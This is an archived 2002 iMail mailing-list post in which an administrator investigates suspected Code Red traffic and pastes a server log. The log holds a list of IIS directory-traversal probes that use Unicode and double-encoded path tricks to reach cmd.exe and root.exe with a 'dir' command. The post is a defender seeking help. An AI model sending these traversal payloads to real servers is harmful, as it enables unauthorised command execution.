> > > Looks like the Code Red attack. > > > > > > If you are running IIS on this same box, just install M$'s URLScan, and > > > it will stop most of it. > > > > > > Also it looks like they are spoofing a local ip (192.168.1.1). > > > > > > > 192.162.1.1 is an interface on a firewall that proxies HTTP traffic; I will > > look at firewall logs today and hopefully find where this is coming from. > > We don't run IIS. > > > > Tracked down attacking IP address to 61.183.69.15. How do I determine who this > belongs to as it is not registered in DNS? >
Well as soon as I block 61.183.69.15 it is now coming from 65.93.178.234 which is unreachable now. Why would our little old mail server be targeted by such different IP subnets? I also wonder why the following code which is going after IIS would DOS iMail since it is only a handful of requests that is initiated only once every few hours? ******************************************* 20020308 120025 Info - 192.168.1.6 GET / HTTP/1.0. 20020308 120047 Info - 192.168.1.1 GET /scripts/root.exe?/c+dir HTTP/1.0. 20020308 120047 Request processed with no user agent and no referer. 20020308 120048 Info - 192.168.1.1 GET /MSADC/root.exe?/c+dir HTTP/1.0. 20020308 120048 Request processed with no user agent and no referer. 20020308 120048 Info - 192.168.1.1 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120048 Request processed with no user agent and no referer. 20020308 120049 Info - 192.168.1.1 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120049 Request processed with no user agent and no referer. 20020308 120050 Info - 192.168.1.1 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120050 Request processed with no user agent and no referer. 20020308 120051 Info - 192.168.1.1 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120051 Request processed with no user agent and no referer. 20020308 120051 Info - 192.168.1.1 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120051 Request processed with no user agent and no referer. 20020308 120052 Info - 192.168.1.1 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120052 Request processed with no user agent and no referer. 20020308 120053 Info - 192.168.1.1 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120053 Request processed with no user agent and no referer. 20020308 120054 Info - 192.168.1.1 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120054 Request processed with no user agent and no referer. 20020308 120054 Info - 192.168.1.1 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120054 Request processed with no user agent and no referer. 20020308 120055 Info - 192.168.1.1 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120055 Request processed with no user agent and no referer. 20020308 120056 Info - 192.168.1.1 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120056 Request processed with no user agent and no referer. 20020308 120057 Info - 192.168.1.1 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120057 Request processed with no user agent and no referer. 20020308 120057 Info - 192.168.1.1 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120057 Request processed with no user agent and no referer. 20020308 120058 Info - 192.168.1.1 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020308 120058 Request processed with no user agent and no referer. 20020308 120126 Info - 192.168.1.6 GET / HTTP/1.0. ******************************************* Also, what does 20020308 120050 Request processed with no user agent and no referer. mean? Dan Please visit http://www.ipswitch.com/support/mailing-lists.html to be removed from this list. An Archive of this list is available at: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/